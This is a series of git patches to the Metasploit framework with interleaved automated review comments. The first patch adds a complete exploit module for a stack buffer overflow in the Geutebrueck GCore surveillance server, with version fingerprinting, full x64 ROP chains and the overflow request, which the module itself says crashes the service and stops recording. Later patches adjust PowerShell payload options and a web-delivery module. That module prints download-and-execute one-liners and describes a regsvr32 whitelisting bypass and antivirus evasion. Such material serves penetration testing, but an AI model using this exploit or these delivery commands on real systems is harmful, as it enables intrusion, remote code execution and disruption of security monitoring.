From d5fd620fbb8eb497ed2bc2e53460d4b298eda599 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Tue, 14 Feb 2017 11:21:36 +0100 Subject: [PATCH 001/254] Add files via upload --- .../http/geutebrueck_gcore_x64_rce_bo.rb | 286 ++++++++++++++++++ 1 file changed, 286 insertions(+) create mode 100644 modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb new file mode 100644 index 0000000000..c29de50090 --- /dev/null +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb 
@@ -0,0 +1,286 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'nokogiri' +require 'open-uri' + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::Tcp + + Rank = NormalRanking + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['www.geutebrueck.com', ''] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => false, + 'DisclosureDate' => '2017-01-24', + 'DefaultTarget' => 0)) + end + + def fingerprint + print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') + @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? 
'1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') + print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end + + def check + fingerprint + end + + def ropchain(target) + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') + + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') + + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 + + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') + + # RSP gets restored with the new value. 
The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') + + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') + + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') + + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') + + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') + + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') + + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') + + [rop, overwrite, stack_align] + + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') + + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') + + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 + + # We have 40 bytes left to align our stack! 
+ # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') + + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') + + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align += [0x140cf3110].pack('Q<') + + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') + + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') + + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... 
+ rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') + + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') + + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') + + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') + + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') + + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') + + [rop, overwrite, stack_align] + + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + + end + end + + def exploit + if target['auto'] + checkcode, target = fingerprint + if checkcode.to_s.include? 'unknown' + print_status('No vulnerable Version detected - exploit aborted.') + else + target_rop, target_overwrite, target_stack_align = ropchain(target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + end + + else + print_status('No auto detection - be sure to choose the right version! 
Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + # sleep(10) + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + + end + end +end From 1a3fe02db1ea75fa4f544c2c24c1139b5fa0d89f Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sun, 16 Jul 2017 04:20:46 -0400 Subject: [PATCH 002/254] Psexec via PSH related fixes Implement removal of comspec and use of the noninteractive option in powershell payloads. This is the Msf side of #6 for rex-powershell. Testing: In-house testing on 2016 standard edition and win10, 201707 revs. --- lib/msf/core/exploit/powershell.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index eac730b97d..906d67bd4d 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb 
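Review bot: `fingerprint` hands an interpolated URL to open-uri's `open()` with no rescue, so an unreachable host or a 404 on `/statistics/runningmoduleslist.xml` raises out of `check` instead of yielding the Unknown result the fallback messages describe, and `check` returns the `[code, target]` pair rather than a bare CheckCode while `exploit` tests it with `checkcode.to_s.include? 'unknown'`. Wrap the fetch, have `check` return `fingerprint.first`, compare with `checkcode == Exploit::CheckCode::Unknown`, and use `URI.parse(url).open` so a string starting with `|` can never reach `Kernel#open`'s pipe-command path. Separately, `payload.encoded` is appended twice (inside `rop` and again after it), so the position of `overwrite` moves with payload length; if the offset to the saved return address is fixed, a single copy padded to a constant length (`"\x41" * (2000 - payload.encoded.length)`) is what the ROP chain presumably expects — confirm against the tested payloads. The auto and manual branches of `exploit` duplicate the whole buffer construction and would be easier to keep consistent as one helper.
```ruby
  def fingerprint
    stats_url = "http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml"
    print_status("Trying to fingerprint server with #{stats_url}...")
    begin
      @doc = Nokogiri::XML(URI.parse(stats_url).open)
    rescue OpenURI::HTTPError, SocketError, SystemCallError, ::Timeout::Error => e
      print_status("Statistics page #{stats_url} is not available (#{e.class}).")
      return [Exploit::CheckCode::Unknown, nil]
    end
    # … unchanged: modulestate scan, version match, crash warnings …
  end

  def check
    fingerprint.first
  end
```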
@@ -14,6 +14,8 @@ module Exploit::Powershell OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]), OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]), OptBool.new('Powershell::exec_in_place', [true, 'Produce PSH without executable wrapper', false]), + OptBool.new('Powershell::remove_comspec', [true, 'Produce script calling powershell directly', false]), + OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]), @@ -220,9 +222,8 @@ module Exploit::Powershell # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) - options.validate(datastore) - - %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload use_single_quotes no_equals method].map do |opt| + %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload + remove_comspec noninteractive use_single_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From 33a06faadb0370f5e8b4cc9f09530a8288744a7c Mon Sep 17 00:00:00 2001 
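Review bot: The new `noninteractive` option defaults to true but is merged into `opts` with `opts[opt] ||= datastore["Powershell::#{opt}"]`, so a caller that passes `noninteractive: false` explicitly has it replaced by the datastore default because `false` is falsy in Ruby; the same happens to `remove_comspec` whenever the datastore value is true and a module passes false. Merge on key presence instead: `opts[opt] = datastore["Powershell::#{opt}"] unless opts.key?(opt)`. The hunk also drops `options.validate(datastore)` without the commit message saying why; if validation now happens elsewhere, a one-line comment at that spot would save the next reader a search. `cmd_psh_payload`'s body continues past the end of the hunk.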
From: RageLtMan Date: Tue, 18 Jul 2017 03:34:02 -0400 Subject: [PATCH 003/254] Remove use_single_quotes option from Msf namespace Internally wrapped lines of powershell built by :cmd_psh_payload in the Rex namespace require being able to place wrapping quotes in different logical places for :generate_psh_command_line and :run_hidden_psh methods. Using single quotes in the Arguments parameter of the hidden PSH runner and double quotes after the -Command flag allows us to wrap the outer command in double quotes, while properly escaping and wrapping the arguments parameter for PSH execution in single quotes. This isn't ideal; in a perfect world we'd be escaping all nested quotes and escape chars of any type valid for PSH. However, that would require more manual testing than anyone has time for (now). --- lib/msf/core/exploit/powershell.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index 906d67bd4d..d3a3bad825 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -18,7 +18,6 @@ module Exploit::Powershell OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), - OptBool.new('Powershell::use_single_quotes', [true, 'Wraps the -Command argument in single quotes', false]), OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]), OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]]) ] 
@@ -223,7 +222,7 @@ module Exploit::Powershell # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload - remove_comspec noninteractive use_single_quotes no_equals method].map do |opt| + remove_comspec noninteractive no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From c187f709dc7dc99c11aae26bc85cdc57a09ca0c2 Mon Sep 17 00:00:00 2001 From: M4P0 Date: Fri, 21 Jul 2017 11:37:12 +0200 Subject: [PATCH 004/254] Update geutebrueck_gcore_x64_rce_bo.rb Review changes with msftidy. --- .../windows/http/geutebrueck_gcore_x64_rce_bo.rb | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index c29de50090..c3ebbd14b8 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'nokogiri' require 'open-uri' 
@@ -24,21 +23,22 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ - ['www.geutebrueck.com', ''] + ['EDB','41153'], + ['URL','www.geutebrueck.com'] ], 'Platform' => 'win', 'Targets' => [ - ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X86_64 }], - ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }], - ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X86_64 }] + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] ], 'Payload' => { 'Space' => '2000' }, - 'Privileged' => false, - 'DisclosureDate' => '2017-01-24', + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) end @@ -272,7 +272,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status('Exploit ready for sending...') sock.put(exploit, 'Timeout' => 20) print_status('Exploit sent!') - # sleep(10) buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") From e787d433444721e7f02b932d2ffe9485a0870376 Mon Sep 17 00:00:00 2001 From: RageLtMan Date: Sat, 22 Jul 2017 02:36:07 -0400 Subject: [PATCH 005/254] Implement wrap_double_quotes in Msf PSH namespace This is the Msf side of Rex Powershell #7 --- lib/msf/core/exploit/powershell.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index d3a3bad825..3686faa8cd 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb 
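Review bot: `['URL', 'www.geutebrueck.com']` is a bare hostname, not a URL, and points at the vendor front page rather than an advisory, so it adds nothing the `['EDB', '41153']` entry does not; give it a scheme and an advisory path or drop it. `'Space' => '2000'` is left as a string where a numeric `'Space' => 2000` is expected, and no `BadChars` are declared even though the payload travels inside an HTTP request line, where CR, LF, NUL or space would plausibly truncate the buffer — worth confirming against the server and declaring. Flipping `'Privileged'` to true is a claim about the account GCoreServer.exe runs under that nothing on this page substantiates; a short comment with the basis for it would help.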
@@ -18,6 +18,7 @@ module Exploit::Powershell OptBool.new('Powershell::noninteractive', [true, 'Execute powershell without interaction', true]), OptBool.new('Powershell::encode_final_payload', [true, 'Encode final payload for -EncodedCommand', false]), OptBool.new('Powershell::encode_inner_payload', [true, 'Encode inner payload for -EncodedCommand', false]), + OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in single quotes', true]), OptBool.new('Powershell::no_equals', [true, 'Pad base64 until no "=" remains', false]), OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', %w[net reflection old msil]]) ] @@ -216,13 +217,13 @@ module Exploit::Powershell # powershell script # @option opts [Boolean] :remove_comspec Removes the %COMSPEC% # environment variable at the start of the command line - # @option opts [Boolean] :use_single_quotes Wraps the -Command - # argument in single quotes unless :encode_final_payload + # @option opts [Boolean] :wrap_double_quotes Wraps the -Command + # argument in double quotes unless :encode_final_payload # # @return [String] Powershell command line with payload def cmd_psh_payload(pay, payload_arch, opts = {}) %i[persist prepend_sleep exec_in_place encode_final_payload encode_inner_payload - remove_comspec noninteractive no_equals method].map do |opt| + remove_comspec noninteractive wrap_double_quotes no_equals method].map do |opt| opts[opt] ||= datastore["Powershell::#{opt}"] end From 1a9a942c1fb5ea8fa8c670cb5fe5d419a1b5aa1f Mon Sep 17 00:00:00 2001 From: Adam Cammack Date: Mon, 7 Aug 2017 13:31:46 -0500 Subject: [PATCH 006/254] Add external module template for capture servers --- lib/msf/core/modules/external/shim.rb | 15 ++++++++--- .../external/templates/capture_server.erb | 27 +++++++++++++++++++ 2 files changed, 38 insertions(+), 4 deletions(-) create mode 100644 lib/msf/core/modules/external/templates/capture_server.erb 
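Review bot: The description string of the new `Powershell::wrap_double_quotes` option reads 'Wraps the -Command argument in single quotes', contradicting the option name and the YARD text added in the second hunk; it looks copied from the removed `use_single_quotes` line. Change it to `OptBool.new('Powershell::wrap_double_quotes', [true, 'Wraps the -Command argument in double quotes', true]),`. Because it defaults to true and is merged with `opts[opt] ||= ...` in `cmd_psh_payload`, a caller passing `wrap_double_quotes: false` is silently overridden as well.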
diff --git a/lib/msf/core/modules/external/shim.rb b/lib/msf/core/modules/external/shim.rb index 4c47d945c8..4b64d8871f 100644 --- a/lib/msf/core/modules/external/shim.rb +++ b/lib/msf/core/modules/external/shim.rb @@ -9,6 +9,8 @@ class Msf::Modules::External::Shim case mod.meta['type'] when 'remote_exploit_cmd_stager' remote_exploit_cmd_stager(mod) + when 'capture_server' + capture_server(mod) end end @@ -26,10 +28,6 @@ class Msf::Modules::External::Shim meta[:name] = mod.meta['name'].dump meta[:description] = mod.meta['description'].dump meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ") - meta[:date] = mod.meta['date'].dump - meta[:references] = mod.meta['references'].map do |r| - "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" - end.join(",\n ") meta[:options] = mod.meta['options'].map do |n, o| "Opt#{o['type'].capitalize}.new(#{n.dump}, @@ -39,11 +37,15 @@ class Msf::Modules::External::Shim end def self.mod_meta_exploit(mod, meta = {}) + meta[:date] = mod.meta['date'].dump meta[:wfsdelay] = mod.meta['wfsdelay'] || 5 meta[:privileged] = mod.meta['privileged'].inspect meta[:platform] = mod.meta['targets'].map do |t| t['platform'].dump end.uniq.join(",\n ") + meta[:references] = mod.meta['references'].map do |r| + "[#{r['type'].upcase.dump}, #{r['ref'].dump}]" + end.join(",\n ") meta[:targets] = mod.meta['targets'].map do |t| "[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]" end.join(",\n ") @@ -56,4 +58,9 @@ class Msf::Modules::External::Shim meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump render_template('remote_exploit_cmd_stager.erb', meta) end + + def self.capture_server(mod) + meta = mod_meta_common(mod) + render_template('capture_server.erb', meta) + end end diff --git a/lib/msf/core/modules/external/templates/capture_server.erb b/lib/msf/core/modules/external/templates/capture_server.erb new file mode 100644 index 0000000000..cbcb4735b8 
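Review bot: Moving the `date` and `references` assignments into `mod_meta_exploit` means a `capture_server` module's `date`/`references` metadata is now silently discarded by `mod_meta_common`, and `mod.meta['references'].map` still raises `NoMethodError` for an exploit whose metadata omits the key. If capture modules are meant to carry references, keep the two assignments in `mod_meta_common`; otherwise guard with `Array(mod.meta['references']).map do |r|` and say in the capture template that these fields are ignored.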
--- /dev/null +++ b/lib/msf/core/modules/external/templates/capture_server.erb @@ -0,0 +1,27 @@ +require 'msf/core/modules/external/bridge' +require 'msf/core/module/external' + +class MetasploitModule < Msf::Auxiliary + # include Msf::Auxiliary::Report + include Msf::Module::External + + def initialize + super({ + <%= common_metadata meta %> + 'Actions' => [ ['Capture'] ], + 'PassiveActions' => ['Capture'], + 'DefaultAction' => 'Capture' + }) + + register_options([ + <%= meta[:options] %> + ]) + end + + def run + print_status("Starting server...") + mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>) + mod.run(datastore) + wait_status(mod) + end +end From e7b4cb71b1cd6bb4f3c7c0b5a945b6d852573d14 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Wed, 6 Sep 2017 12:27:04 +0100 Subject: [PATCH 007/254] Add PSH-Proxy to multi/script/web_delivery --- modules/exploits/multi/script/web_delivery.rb | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..26054b2f9d 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -62,6 +62,12 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PowerShell - Use the system proxy', true ]) + ], self.class + ) end def on_request_uri(cli, _request) 
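Review bot: `Msf::Modules::External::Bridge.open(<%= meta[:path] %>)` splices the module path into generated Ruby source unquoted; whether `mod_meta_common` already `.dump`s it is outside this page, so confirm it is dumped exactly once, because an undumped path containing `'` or `#{` would be evaluated as code when the shim is loaded. The commented-out `# include Msf::Auxiliary::Report` should either be deleted or carry a note on why it is deferred. A header comment on the template saying it is rendered by `Msf::Modules::External::Shim.capture_server` would help the next reader place it.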
@@ -89,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
 print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"")
 when 'PSH'
 ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
- download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
+ download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
 download_and_run = "#{ignore_cert}#{download_string}"
 print_line generate_psh_command_line(
 noprofile: true,
From b884705a9350f3eb8712db820d165d2859b9cdd0 Mon Sep 17 00:00:00 2001
From: g0tmi1k
Date: Wed, 6 Sep 2017 12:35:52 +0100
Subject: [PATCH 008/254] regsvr32_applocker_bypass_server -> web_delivery
---
 modules/exploits/multi/script/web_delivery.rb | 69 +++++++++++++++----
 .../misc/regsvr32_applocker_bypass_server.rb | 3 +
 2 files changed, 57 insertions(+), 15 deletions(-)
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
index 26054b2f9d..11a4345eb4 100644
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
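Review bot: The new `download_string` line wraps each ternary branch in redundant parentheses and runs far past 120 columns, which hides the only thing that differs between the branches. Bind the helper module once and keep the ternary short: `psh = Rex::Powershell::PshMethods` then `download_string = datastore['PSH-Proxy'] ? psh.proxy_aware_download_and_exec_string(url) : psh.download_and_exec_string(url)`. The enclosing `primer` method continues past the end of the hunk.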
@@ -15,22 +15,31 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. 
